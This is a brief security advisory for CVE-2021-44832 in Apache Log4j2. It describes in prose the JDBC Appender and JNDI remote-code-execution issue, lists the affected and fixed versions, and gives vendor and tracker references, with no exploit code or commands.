CVE-2021-44832: Improper Input Validation and Injection in Apache Log4j2
(updated )
Apache Log4j2 versions 2.0-beta7 through 2.17.0 (excluding security fix releases 2.3.2 and 2.12.4) are vulnerable to an attack where an attacker with permission to modify the logging configuration file can construct a malicious configuration using a JDBC Appender with a data source referencing a JNDI URI which can execute remote code. This issue is fixed by limiting JNDI data source names to the java protocol in Log4j2 versions 2.17.1, 2.12.4, and 2.3.2.
References
- cert-portal.siemens.com/productcert/pdf/ssa-784507.pdf
- github.com/advisories/GHSA-8489-44mv-ggj8
- github.com/apache/logging-log4j2
- issues.apache.org/jira/browse/LOG4J2-3293
- lists.apache.org/thread/s1o5vlo78ypqxnzn6p8zf6t9shtq5143
- lists.debian.org/debian-lts-announce/2021/12/msg00036.html
- lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/EVV25FXL4FU5X6X5BSL7RLQ7T6F65MRA
- lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/T57MPJUW3MA6QGWZRTMCHHMMPQNVKGFC
- nvd.nist.gov/vuln/detail/CVE-2021-44832
- sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-apache-log4j-qRuKNEbd
- security.netapp.com/advisory/ntap-20220104-0001
- www.oracle.com/security-alerts/cpuapr2022.html
- www.oracle.com/security-alerts/cpujan2022.html
- www.oracle.com/security-alerts/cpujul2022.html
Code Behaviors & Features
Detect and mitigate CVE-2021-44832 with GitLab Dependency Scanning
Secure your software supply chain by verifying that all open source dependencies used in your projects contain no disclosed vulnerabilities. Learn more about Dependency Scanning →